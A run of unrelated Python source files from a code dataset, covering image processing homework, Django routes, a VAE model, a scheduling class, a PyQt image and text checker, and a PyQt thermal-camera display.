\n\n","repo_name":"vajeesh/Python","sub_path":"PYTHON_LAB_ASSIGNMENT-1-EXERCISE-1.py","file_name":"PYTHON_LAB_ASSIGNMENT-1-EXERCISE-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24405504845","text":"import matplotlib.pyplot as plt\nfrom skimage import io\nimport numpy as np\nfrom skimage.filters import threshold_otsu\n\n# 1) display the image\nfilename = \"airfield.tif\"\nfilename = io.imread(filename)\nplt.imshow(filename)\nplt.show()\n\n# 2) compute the histogram of the image and plot it\nshape = np.shape(filename)\nhistogram_array = np.zeros(256)\nfor i in range(shape[0]):\n    for j in range(shape[1]):\n        histogram_index = round(filename[i][j])\n        histogram_array[histogram_index] += 1\n\nplt.bar(range(256), histogram_array)\nplt.show()\n\n# 3) Try to make a contrast adjustment and a brightness adjustment by\n# carrying out simple point operations. Look at the effects on the image.\n\n
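# A point operation maps each pixel independently: g(x, y) = a*f(x, y) + b,\n# where a scales the contrast and b shifts the brightness.\n\n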
# increasing contrast by 50 %\nfor i in range(shape[0]):\n    for j in range(shape[1]):\n        filename[i, j] = int(filename[i, j] * 1.5 + 0.5) # +0.5 to round up to int\n        if filename[i, j] > 255:\n            filename[i, j] = 255\nplt.imshow(filename, cmap='gray')\nplt.show()\n\n# increasing brightness by 20 units\nfor i in range(shape[0]):\n    for j in range(shape[1]):\n        filename[i, j] = int(filename[i, j] + 20)\n        if filename[i, j] > 255:\n            filename[i, j] = 255\nplt.imshow(filename, cmap='gray')\nplt.show()\n\n# 4) Carry out a histogram equalisation.\ncumhist = np.zeros(256)\ncumhist[0] = histogram_array[0]\nfor i in range(255):\n    cumhist[i+1] = cumhist[i] + histogram_array[i+1]\n\nM = shape[0]\nN = shape[1]\nfor i in range(shape[0]):\n    for j in range(shape[1]):\n        a = int(filename[i, j])\n        b = cumhist[a] * (256 - 1) / (M * N)\n        filename[i, j] = b\n\nplt.imshow(filename, 'gray')\nplt.show()\n\n# 5) plot the histogram of the modified image\nnew_histogram_array = np.zeros(256)\nfor i in range(shape[0]):\n    for j in range(shape[1]):\n        histogram_index = round(filename[i][j])\n        new_histogram_array[histogram_index] += 1\n\nplt.bar(range(256), new_histogram_array)\nplt.show()\n\n# 6) Carry out an Otsu threshold on the image\nvarMax = 0\nthreshold = 0\n\nfor i in range(256):\n    Bg = histogram_array[:i]\n    Fg = histogram_array[i:]\n    wB = sum(Bg)/sum(histogram_array)\n    wF = sum(Fg)/sum(histogram_array)\n\n    if sum(Bg) == 0 or sum(Fg) == 0:\n        continue\n\n    mB = sum(Bg * range(i))/sum(Bg)\n    mF = sum(Fg * range(i, 256))/sum(Fg)\n\n    # Calculate Between Class Variance\n    varBetween = wB * wF * (mB - mF) * (mB - mF)\n\n    if varBetween > varMax:\n        varMax = varBetween\n        threshold = i\n\nprint(threshold)\n\nimage = \"airfield.tif\"\nimage = io.imread(image)\nthresh = threshold_otsu(image)\nprint(thresh)\n","repo_name":"bardpedersen/INF250","sub_path":"Week Assignments/Uke38/Uke38.py","file_name":"Uke38.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23845145483","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'login'\nurlpatterns = [\n path('', views.LoginView.as_view(), name='login'),\n path('login/', views.LoginView.as_view(), name='login'),\n path('register/', views.RegisterView.as_view(), name='register'),\n path('logout/', views.logout_view, name='logout')\n # path('login_request/', views.LoginView.login_request, name='login_request')\n # path('', views.index, name=\"index\")\n # path('/', views.DetailView.as_view(), name='detail'),\n # path('/results/', views.ResultsView.as_view(), name='results'),\n # path('/vote/', views.vote, name='vote'),\n]\n","repo_name":"Yikai-coder/Public-Opinion-Emergency-System","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"18798571102","text":"from typing import Optional, List, Union\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom segmentation_models_pytorch.encoders import get_encoder\nfrom segmentation_models_pytorch.decoders.unet.decoder import \\\n CenterBlock, DecoderBlock\nfrom segmentation_models_pytorch.base import (\n SegmentationHead\n)\n\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n encoder_channels,\n decoder_channels,\n n_blocks=5,\n use_batchnorm=True,\n attention_type=None,\n center=False,\n z_dim: int = 10\n ):\n super().__init__()\n\n if n_blocks != len(decoder_channels):\n raise ValueError(\n \"Model depth is {}, but you provide \"\n \"`decoder_channels` for {} blocks.\".format(\n n_blocks, len(decoder_channels)\n )\n )\n\n # remove first skip with same spatial resolution\n encoder_channels = encoder_channels[1:]\n # reverse channels to start from head of encoder\n encoder_channels = encoder_channels[::-1]\n\n # computing blocks input and output channels\n head_channels = encoder_channels[0]\n in_channels = [head_channels] + list(decoder_channels[:-1])\n out_channels = decoder_channels\n\n if center:\n self.center = CenterBlock(\n head_channels, head_channels, use_batchnorm=use_batchnorm\n )\n else:\n self.center = nn.Identity()\n\n # combine decoder keyword arguments\n kwargs = dict(\n use_batchnorm=use_batchnorm, attention_type=attention_type\n )\n blocks = [\n DecoderBlock(in_ch, 0, out_ch, **kwargs)\n for in_ch, out_ch in zip(in_channels, out_channels)\n ]\n self.blocks = nn.ModuleList(blocks)\n self.linear = nn.Linear(z_dim, 512)\n\n def forward(self, z, encoder_output_size: int = 7):\n x = self.linear(z)\n x = x.view(z.size(0), 512, 1, 1)\n x = F.interpolate(x, size=encoder_output_size)\n for i, decoder_block in enumerate(self.blocks):\n x = decoder_block(x, None)\n return x\n\n\nclass AutoEncoder(nn.Module):\n def __init__(\n self,\n encoder_name: str = \"resnet34\",\n encoder_depth: int = 5,\n encoder_weights: Optional[str] = \"imagenet\",\n decoder_use_batchnorm: bool = True,\n decoder_channels: List[int] = (256, 128, 64, 32, 16),\n decoder_attention_type: Optional[str] = None,\n in_channels: int = 3,\n z_dim: int = 10,\n activation: Optional[Union[str, callable]] = None\n ):\n super().__init__()\n\n self.encoder = get_encoder(\n encoder_name,\n in_channels=in_channels,\n depth=encoder_depth,\n weights=encoder_weights,\n )\n\n self.decoder = Decoder(\n encoder_channels=self.encoder.out_channels,\n decoder_channels=decoder_channels,\n n_blocks=encoder_depth,\n use_batchnorm=decoder_use_batchnorm,\n center=True if encoder_name.startswith(\"vgg\") else False,\n attention_type=decoder_attention_type,\n z_dim=z_dim\n )\n\n 
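# the segmentation head maps the last decoder feature map back to the\n        # original number of input channels, giving an image-shaped reconstruction\n        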
self.segmentation_head = SegmentationHead(\n in_channels=decoder_channels[-1],\n out_channels=in_channels,\n activation=activation,\n kernel_size=3,\n )\n\n self.linear = nn.Linear(512, 2 * z_dim)\n self.z_dim = z_dim\n\n def check_input_shape(self, x):\n h, w = x.shape[-2:]\n output_stride = self.encoder.output_stride\n if h % output_stride != 0 or w % output_stride != 0:\n new_h = (h // output_stride + 1) * output_stride if h % output_stride != 0 else h\n new_w = (w // output_stride + 1) * output_stride if w % output_stride != 0 else w\n raise RuntimeError(\n f\"Wrong input shape height={h}, width={w}. Expected image height and width \"\n f\"divisible by {output_stride}. Consider pad your images to shape ({new_h}, {new_w}).\"\n )\n\n def reparameterize(self, x):\n x = F.adaptive_avg_pool2d(x, 1)\n x = x.view(x.size(0), -1)\n x = self.linear(x)\n mean = x[:, :self.z_dim]\n logvar = x[:, self.z_dim:]\n std = torch.exp(logvar / 2) # in log-space, squareroot is divide by two\n epsilon = torch.randn_like(std)\n return epsilon * std + mean\n\n def forward(self, x):\n \"\"\"Sequentially pass `x` trough model`s encoder, decoder and heads\"\"\"\n\n self.check_input_shape(x)\n\n encoder_output = self.encoder(x)[-1]\n z = self.reparameterize(encoder_output)\n decoder_output = self.decoder(z, encoder_output.shape[-1])\n result = self.segmentation_head(decoder_output)\n\n return result\n","repo_name":"m0nteg0/data_cleaner","sub_path":"data_cleaner/models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20044189020","text":"\"\"\"\nData structures not part of the databank\n\"\"\"\nfrom tools.helper import set_def_props\nfrom tools.grade import Grade\n\nfrom collections import defaultdict\n\nclass DataX:\n # Number of teachers, sections, bands (set to 0)\n props_v = ['nteas', 'nsects', 'ns', 'nbds']\n\n # mt1_sects: Sections that can meet once per day\n # btb: Exceptions to the BTB limit rule\n # xs: Exceptions to individual schedule\n # clash: Conflicting sections\n props_l = ['mt1_sects', 'btb', 'xs', 'clash']\n \n # mts_sects: list of sections for each meet num\n # bands: sections for each band name\n # tea_sects: list of sections for each teacher\n # spots: sections size\n # tbd_courses: TBD courses\n # stud_crs_map: student-course map\n # stud_sects: student-sections map\n # chunked: set of chunked student ids\n props_d = ['new_ids', 'meetmap', 'mts_sects', 'bands', 'sect_names', 'tea_sects', 'spots', 'tbd_courses', 'stud_crs_map', 'stud_sects', 'chunk_weights', 'chunked', 'chunk_reps']\n \n def __init__(self, grades):\n # Default\n set_def_props(self, DataX.props_v, DataX.props_l, DataX.props_d)\n self.setup(grades)\n\n def setup(self, specs):\n \"\"\"Initialize structures\"\"\"\n self.grades = {g : Grade(g) for g in specs.grades}\n # assignment to courses/sections\n self.decisions = defaultdict(list)\n # set of chunked student ids\n #self.chunked = set()\n","repo_name":"pleatcher/Projects","sub_path":"ScheduleGenerator/code/blocks/datax.py","file_name":"datax.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19559528941","text":"import numpy as np\n# my own implementations of various tools, but ended up using mostly\n# sklearn algos (for safety). 
I do data scaling.\n\nclass Scaler(object):\n    # scale input data\n    def __init__(self, data):\n        self.mu = np.mean(data)\n        self.sig = np.std(data)\n\n    def __call__(self, unscaled_data):\n        scaled_data = (unscaled_data - self.mu)/self.sig\n        return scaled_data\n\ndef bootstrap_with_replacement(x,y):\n    # Simple bootstrap, simply resample with replacement\n    inds = np.random.choice(len(x), size = len(x), replace = True)\n    return x[inds], y[inds]\n\n# def bootstrap_dataset(x, y, train_fraction = 0.8): # better bootstrap ?\n#     # Leave one out bootstrap\n#     n_samples = len(x)\n#     n_train = int(n_samples*train_fraction)\n#     test_mask = np.ones(n_samples, dtype = bool)\n#     train_inds = np.sort(np.random.choice(n_samples, size = n_train, replace = False))\n#     test_mask[train_inds] = False\n#     return split_data(x, y, train_inds, test_mask)\n\ndef split_data(x, y, train_fraction = 0.8):\n    # split data into train/test\n    n_samples = len(x)\n    n_train = int(n_samples*train_fraction)\n\n    train_inds = np.sort(np.random.choice(n_samples, size = n_train, replace = False))\n    test_mask = np.ones(n_samples, dtype = bool)\n    test_mask[train_inds] = False\n\n    x_train = x[train_inds]\n    y_train = y[train_inds]\n    x_test = x[test_mask]\n    y_test = y[test_mask]\n    return x_train, y_train, x_test, y_test\n","repo_name":"markusbp/fys_stk4155","sub_path":"project1/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20260193243","text":"num=int(input())\nlength=[]\nblack=[]\nstrip=[]\nfor i in range(num):\n    x,y=map(int,input().split(\" \"))\n    length.append(x)\n    black.append(y)\n    strip.append(input())\n\n# for each strip, slide a window of length k (the required black segment)\n# over it and count the white cells inside; the minimum count is the\n# number of cells that must be repainted\nfor t in range(num):\n    s=strip[t]\n    k=black[t]\n    whites=s[:k].count('W')\n    best=whites\n    for i in range(k,len(s)):\n        whites+=(s[i]=='W')-(s[i-k]=='W')\n        best=min(best,whites)\n    print(best)\n","repo_name":"BiluAilu/A2SV-Practice","sub_path":"Data Structure/Two pointer/Black and White Stripe.py","file_name":"Black and White Stripe.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74063421568","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing CheckTool.\n\"\"\"\nimport sys, threading\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtCore import pyqtSignature, pyqtSignal, QObject\n\nimport os\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nfrom PIL import Image\n\nfrom Ui_Checker import Ui_Dialog\n\n\nclass CheckTool(QDialog, Ui_Dialog, QObject):\n    \"\"\"\n    Class documentation goes here.\n    \"\"\"\n    printSignal = pyqtSignal(str)\n\n    def __init__(self, parent=None):\n        QDialog.__init__(self, parent)\n        self.setupUi(self)\n        self.printSignal.connect(self.printLog)\n\n\n\n\n\n    @pyqtSignature(\"\")\n    def on_check_clicked(self):\n        rootDir = self.lineEdit.text()\n        dir = unicode(rootDir, 'utf-8')\n        if os.path.exists(dir):\n            #self.checkDir(dir)\n            thread = threading.Thread(target=self.checkDir, args=(dir,))\n            thread.setDaemon(True)\n            thread.start()\n        else:\n            self.printLog(u\"--------------Please select a valid folder!!----------------\")\n\n\n    @pyqtSignature(\"\")\n    def on_file_clicked(self):\n        s = QtGui.QFileDialog.getExistingDirectory(self,u\"Select folder\", \"/\")\n        self.lineEdit.setText(unicode(s, \"utf8\"))\n\n    def checkDir(self, rootDir):\n        self.printSignal.emit(u\"--------------Check started!----------------\")\n        list_dirs = os.walk(rootDir)\n        for root, dirs, files in list_dirs:\n
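            # check every picture and text file found under the root folder\n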
            # for d in dirs:\n            #     print os.path.join(root, d)\n            for f in files:\n                if f.endswith('.jpg') or f.endswith('.png'):\n                    self.checkPic(os.path.join(root, f))\n                if f.endswith('.txt'):\n                    self.checkTxt(os.path.join(root, f))\n        self.printSignal.emit(u\"--------------Check finished!----------------\")\n\n    def checkPic(self, PicPath):\n        file = os.path.basename(PicPath)\n        size = os.path.getsize(PicPath)\n        # get the image object\n        im = Image.open(PicPath)\n        # get the image width and height\n        iw, ih = im.size\n\n        ## 1-2-3-4: 1100*1390 px (≤300KB)\n        if file.startswith(\"1\") or file.startswith(\"2\") or file.startswith(\"3\") or file.startswith(\n                \"4\") or file.startswith(\"15\"):\n            if size > 300 * 1024:\n                msg = u\"%s file size is %d, exceeding the 300KB limit \" % (PicPath, size)\n                self.printSignal.emit(msg)\n            if iw > 1100 or ih > 1390:\n                msg = u\"%s image is %d*%d px, not matching the required size 1100*1390!\" % (PicPath, iw, ih)\n                self.printSignal.emit(msg)\n\n        ## 5-7: 235*297 px (≤30KB)\n        if file.startswith(\"5\") or file.startswith(\"7\"):\n            if size > 30 * 1024:\n                msg = u\"%s file size is %d, exceeding the 30KB limit \" % (PicPath, size)\n                self.printSignal.emit(msg)\n            if iw > 235 or ih > 297:\n                msg = u\"%s image is %d*%d px, not matching the required size 235*297!\" % (PicPath, iw, ih)\n                self.printSignal.emit(msg)\n\n        ## 6: 750*10000 px, ≤2MB\n        if file.startswith(\"6\"):\n            if size > 2 * 1024 * 1024:\n                msg = u\"%s file size is %d, exceeding the 2MB limit \" % (PicPath, size)\n                self.printSignal.emit(msg)\n            if iw > 750 or ih > 10000:\n                msg = u\" %s image is %d*%d px, not matching the required size 750*10000!\" % (PicPath, iw, ih)\n                self.printSignal.emit(msg)\n\n\n    def checkTxt(self, TxtPath):\n        file = open(TxtPath, 'r')\n        for (num, line) in enumerate(file, 1):\n            if line.find(\"taobao.com\") != -1 or line.find(\"tmall.com\") != -1:\n                msg = u\"%s line %d contains the string taobao.com or tmall.com, please check!\" % (TxtPath, num)\n                self.printSignal.emit(msg)\n        file.close()\n\n    def printLog(self, msg):\n        self.textBrowser.append(msg)\n        self.textBrowser.moveCursor(QtGui.QTextCursor.End)\n\n\n\nif __name__ == \"__main__\":\n    app = QtGui.QApplication(sys.argv)\n    ck = CheckTool()\n    ck.show()\n    sys.exit(app.exec_())\n","repo_name":"li24361/Checker","sub_path":"Checker.py","file_name":"Checker.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5168034405","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n###################################################################################################\n\nfrom PyQt4.QtCore import QTimer, SIGNAL, SLOT, Qt, QPointF, QPoint, QRectF, QRect\nfrom PyQt4.QtGui import QMessageBox, QTextEdit, QDialog, QPolygonF,QPainter, QPen, QColor \nfrom PyQt4.QtGui import QBrush, QMainWindow,QWidget,QToolTip,QApplication, QFont,QIcon,QAction\nfrom PyQt4.QtGui import QFrame,QListWidget,QComboBox,QCheckBox,QPushButton,QProgressBar,QLineEdit,QLabel\nfrom PyQt4.QtGui import QTextBrowser, QCursor, qApp, QDesktopWidget\nfrom PyQt4.QtGui import QGraphicsView, QGraphicsScene, QPicture, QPaintDevice, QStaticText\n\n###################################################################################################\nclass ThermoFrame(QFrame):\n\n    # =======================================================================\n    def __init__(self, parent=None):\n\n        # -------------------------------------------------------------------\n        QFrame.__init__(self, parent);\n\n        # -------------------------------------------------------------------\n        self.setFrameShape( 0x0001 );\n        \"\"\"\n        QFrame.NoFrame 0 QFrame draws nothing\n        QFrame.Box 0x0001 QFrame draws a box around its contents\n        QFrame.Panel 0x0002 QFrame draws a panel to make the contents appear 
raised or sunken\n QFrame.StyledPanel 0x0006 draws a rectangular panel with a look that depends on the current GUI style. It can be raised or sunken.\n QFrame.HLine 0x0004 QFrame draws a horizontal line that frames nothing (useful as separator)\n QFrame.VLine 0x0005 QFrame draws a vertical line that frames nothing (useful as separator)\n QFrame.WinPanel 0x0003 rectangular panel that can be raised or sunken like those in Windows 2000\n \"\"\"\n\n # -------------------------------------------------------------------\n\n\n #self.setFrameStyle(QFrame.NoFrame);\n\n # -------------------------------------------------------------------\n self.PARENT = parent;\n self.INITED = False;\n self.ANTIALIASING = True;\n self.W = 0;\n self.H = 0;\n\n self.MATRIX = {};\n self.MATRIX_W = 36;\n self.MATRIX_H = 61;\n self.PX_SIZE = [20, 10];\n self.BORDER_W = 2;\n self.ML = 20;\n self.MT = 30;\n \n self.setGeometry(self.ML, self.MT, self.MATRIX_W*self.PX_SIZE[0]+ (self.BORDER_W*2), self.MATRIX_H*self.PX_SIZE[1] + (self.BORDER_W*2) );\n self.setStyleSheet( \"QFrame{ background-color: #000; color: #fff; border-style: solid; border-width: \"+str(self.BORDER_W)+\"px; border-color: #fff; }\" );\n \n # -------------------------------------------------------------------\n self.BTNS_ML = self.MATRIX_W*self.PX_SIZE[0]+self.BORDER_W*2+30+self.ML;\n self.LABELS_STYLE = \"QLabel{ color: #fff;}\"\n\n # -----------------------------------\n # STATUS LABEL\n self.STATUS_LABEL_DISCONN = \"QLabel{ color: #000; font-weight: bold; background-color: #F00; padding-left: 10px; line-height: 26px; }\";\n self.STATUS_LABEL_CONN = \"QLabel{ color: #000; font-weight: bold; background-color: #FF0; padding-left: 10px; line-height: 26px; }\";\n self.STATUS_LABEL_RUNNING = \"QLabel{ color: #000; font-weight: bold; background-color: #0F0; padding-left: 10px; line-height: 26px; }\";\n\n self.STATUS_LABEL = QLabel( \"Disconnected\" , self.PARENT);\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n self.STATUS_LABEL.setGeometry( 280, 2, 200, 26 );\n\n # serial port\n self.SERIAL_PORT_INPUT_LABEL = QLabel( \"Serial port:\" , self.PARENT);\n self.SERIAL_PORT_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+0, 200, 25 );\n self.SERIAL_PORT_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_PORT_INPUT = QLineEdit( self.PARENT.SERIAL_PORT , self.PARENT);\n self.SERIAL_PORT_INPUT.setGeometry( self.BTNS_ML, self.MT+25, 200, 25 );\n\n # -----------------------------------\n # serial baudrate\n self.SERIAL_BAUDRATE_INPUT_LABEL = QLabel( \"Baudrate: (speed e.g 9600)\" , self.PARENT);\n self.SERIAL_BAUDRATE_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+50, 200, 25 );\n self.SERIAL_BAUDRATE_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_BAUDRATE_INPUT = QLineEdit( str(self.PARENT.SERIAL_BAUDRATE) , self.PARENT);\n self.SERIAL_BAUDRATE_INPUT.setGeometry( self.BTNS_ML, self.MT+75, 200, 25 );\n\n # -----------------------------------\n # serial timeout\n self.SERIAL_TIMEOUT_INPUT_LABEL = QLabel( \"Serial timeout:\" , self.PARENT);\n self.SERIAL_TIMEOUT_INPUT_LABEL.setGeometry( self.BTNS_ML+5, self.MT+100, 200, 25 );\n self.SERIAL_TIMEOUT_INPUT_LABEL.setStyleSheet( self.LABELS_STYLE );\n\n self.SERIAL_TIMEOUT_INPUT = QLineEdit( str(self.PARENT.SERIAL_TIMEOUT) , self.PARENT);\n self.SERIAL_TIMEOUT_INPUT.setGeometry( self.BTNS_ML, self.MT+125, 200, 25 );\n\n # -----------------------------------\n # buttons\n self.CONNECT_BTN = QPushButton(\"Connect\", self.PARENT);\n self.CONNECT_BTN.setGeometry( self.BTNS_ML, 
self.MT+165, 200, 25 );\n self.CONNECT_BTN.clicked.connect( self.CONNECT );\n\n\n self.START_BTN = QPushButton(\"Start\", self.PARENT);\n self.START_BTN.setGeometry( self.BTNS_ML, self.MT+195, 200, 25 );\n self.START_BTN.clicked.connect( self.START );\n\n self.STOP_BTN = QPushButton(\"Stop\", self.PARENT);\n self.STOP_BTN.setGeometry( self.BTNS_ML, self.MT+225, 200, 25 );\n self.STOP_BTN.clicked.connect( self.STOP );\n\n self.HEAD_UP_BTN = QPushButton(\"HEAD-UP: (10)\", self.PARENT);\n self.HEAD_UP_BTN.setGeometry( self.BTNS_ML, self.MT+300, 200, 25 );\n self.HEAD_UP_BTN.clicked.connect( self.PARENT.HEAD_UP );\n\n self.HEAD_DN_BTN = QPushButton(\"HEAD-DOWN: (10)\", self.PARENT);\n self.HEAD_DN_BTN.setGeometry( self.BTNS_ML, self.MT+330, 200, 25 );\n self.HEAD_DN_BTN.clicked.connect( self.PARENT.HEAD_DOWN );\n\n\n # -------------------------------------------------------------------\n self.arrow_style = \"QLabel{ font-size: 14px; font-weight: bold; color: #F00; }\";\n self.SCAN_POS_ARROW_L_ML = self.ML-10;\n self.SCAN_POS_ARROW_L_MT = self.MT+2;\n\n self.SCAN_POS_ARROW_L = QLabel(u\"█\", self.PARENT);\n self.SCAN_POS_ARROW_L.setStyleSheet( self.arrow_style );\n self.SCAN_POS_ARROW_L.setGeometry( self.SCAN_POS_ARROW_L_ML, self.SCAN_POS_ARROW_L_MT, 10, 10 );\n\n self.SCAN_POS_ARROW_R_ML = self.ML+self.MATRIX_W*self.PX_SIZE[0]+self.BORDER_W*3;\n self.SCAN_POS_ARROW_R_MT = self.MT+2;\n\n self.SCAN_POS_ARROW_R = QLabel(u\"█\", self.PARENT);\n self.SCAN_POS_ARROW_R.setStyleSheet( self.arrow_style );\n self.SCAN_POS_ARROW_R.setGeometry( self.SCAN_POS_ARROW_R_ML, self.SCAN_POS_ARROW_R_MT, 10, 10 );\n\n # -------------------------------------------------------------------\n self._CANDEL_G_COLOR = QColor(0,225,0, 255 );\n self._CANDEL_R_COLOR = QColor(225,0,0, 255 );\n\n # -------------------------------------------------------------------\n self.INIT();\n\n # -------------------------------------------------------------------\n \n # =======================================================================\n def CONNECT(self):\n\n # -------------------------------------------------------------------\n self.PARENT.SERIAL_PORT = str(self.SERIAL_PORT_INPUT.text() );\n self.PARENT.SERIAL_BAUDRATE = int( self.SERIAL_BAUDRATE_INPUT.text() );\n self.PARENT.SERIAL_TIMEOUT = float( self.SERIAL_TIMEOUT_INPUT.text() );\n\n if self.PARENT.CONNECT():\n self.STATUS_LABEL.setText(\"Connected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_CONN );\n\n else:\n self.STATUS_LABEL.setText(\"Disconnected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def START(self):\n\n # -------------------------------------------------------------------\n if self.PARENT.START():\n self.STATUS_LABEL.setText(\"Running\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_RUNNING );\n\n else:\n self.STATUS_LABEL.setText(\"Disconnected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_DISCONN );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def STOP(self):\n\n # -------------------------------------------------------------------\n if self.PARENT.STOP():\n self.STATUS_LABEL.setText(\"Connected\");\n self.STATUS_LABEL.setStyleSheet( self.STATUS_LABEL_CONN );\n\n # -------------------------------------------------------------------\n\n # 
=======================================================================\n def INIT( self ):\n\n # -------------------------------------------------------------------\n try:\n\n row = 0;\n\n while row < self.MATRIX_H:\n self.MATRIX[ \"_\"+str(row) ] = [53 for x in xrange(self.MATRIX_W)]\n row += 1;\n\n\n self.show();\n self.INITED = True;\n\n except Exception as _err:\n\n self.EXCEPT( \"\", _err );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def poly(self, _pts):\n \n pass;\n \"\"\"\n for x in xrange(0, len(_pts)):\n if self._CANDELS[x][0] == None:\n self._CANDELS[x][0] = 0;\n if self._CANDELS[x][1] == None:\n self._CANDELS[x][1] = 0;\n\n return QPolygonF(map(lambda p: QPointF(*p), _pts))\n \"\"\"\n\n # =======================================================================\n def paintEvent(self, event):\n\n # -------------------------------------------------------------------\n Painter = QPainter()\n Painter.begin(self)\n #Painter.restore();\n # -------------------------------------------------------------------\n if self.ANTIALIASING:\n \n Painter.setRenderHint(Painter.Antialiasing);\n\n # -------------------------------------------------------------------\n Painter.setPen(QPen(QColor(\"#333333\"), 0)); # main canvas bg\n\n for row in self.MATRIX:\n\n row_num = int(row.replace(\"_\", \"\"));\n\n for row_index in xrange(0, len( self.MATRIX[row] )):\n \n \"\"\"\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n \"\"\"\n\n if self.MATRIX[row][row_index] < 50: # blue\n Painter.setBrush(QBrush( QColor( 0, 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 100: # purple\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], 0, self.MATRIX[row][row_index] ) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 150: # orange\n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], int(self.MATRIX[row][row_index]/2), 0) )); # QColor( 255, 100, 20 )\n\n elif self.MATRIX[row][row_index] < 200: # yellow \n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], self.MATRIX[row][row_index], 0 ) )); # QColor( 255, 100, 20 )\n\n else: # white \n Painter.setBrush(QBrush( QColor( self.MATRIX[row][row_index], self.MATRIX[row][row_index], int(self.MATRIX[row][row_index]/2 ) ) )); # QColor( 255, 100, 20 )\n\n \n Painter.drawRect( self.BORDER_W+row_index*self.PX_SIZE[0], self.BORDER_W+row_num*self.PX_SIZE[1], self.PX_SIZE[0], self.PX_SIZE[1]);\n\n # -------------------------------------------------------------------\n #Painter.save();\n Painter.end();\n # -------------------------------------------------------------------\n\n # =======================================================================\n def UPDATE_ROW( self ):\n\n # -------------------------------------------------------------------\n try:\n\n tmp = self.PARENT.MATRIX_ROW.split(\"|\");\n row = \"_\"+tmp[0];\n\n self.SCAN_POS_ARROW_L.setGeometry( self.SCAN_POS_ARROW_L_ML, self.SCAN_POS_ARROW_L_MT + (self.PX_SIZE[1]*int(tmp[0])), 10, 10 );\n self.SCAN_POS_ARROW_R.setGeometry( self.SCAN_POS_ARROW_R_ML, self.SCAN_POS_ARROW_R_MT + (self.PX_SIZE[1]*int(tmp[0])), 10, 10 );\n\n raw_data = tmp[1].split(\",\");\n\n data = [];\n\n for i in xrange(0, self.MATRIX_W):\n\n ii = raw_data[i].strip();\n if ii != \"\":\n self.MATRIX[ \"_\"+tmp[0]][i] = int( ii );\n\n self.update();\n\n except 
Exception as _err:\n self.EXCEPT( \"UPDATE_ROW: \", _err );\n\n # -------------------------------------------------------------------\n\n # =======================================================================\n def UPDATE( self ):\n\n # -------------------------------------------------------------------\n # 60|76,66,67,64,69,71,73,75,75,73,72,74,|105,104,104,103,103,102,103,103,103,103,103,103,|89,84,81,83,81,80,80,79,79,80,79,79,\n # -------------------------------------------------------------------\n with open(\"data.list\", \"r\") as FS:\n\n for LL in FS:\n\n tmp = LL.split(\"|\");\n row = \"_\"+tmp[0];\n\n raw_data = tmp[1].split(\",\");\n\n data = [];\n\n for i in raw_data:\n\n i = i.strip();\n if i != \"\":\n data.append( int(i.strip()));\n\n self.MATRIX[ \"_\"+tmp[0]] = data;\n\n # -------------------------------------------------------------------\n self.update();\n # -------------------------------------------------------------------\n\n # =======================================================================\n def EXCEPT(self, _info=\"no-info\", _exception=\"\"):\n\n # -------------------------------------------------------------------\n print( str(_info)+\" : \"+str(_exception) );\n # -------------------------------------------------------------------\n\n # =======================================================================\n\n###################################################################################################\n","repo_name":"ch3ll0v3k/thermal-camera","sub_path":"modules/thermo_frame.py","file_name":"thermo_frame.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2534599640","text":"from tkinter import *\n#from tkinter import filedialog\nfrom PIL import ImageTk, Image\n#from tkinter import messagebox\n#import os\n#cmd = \"curl 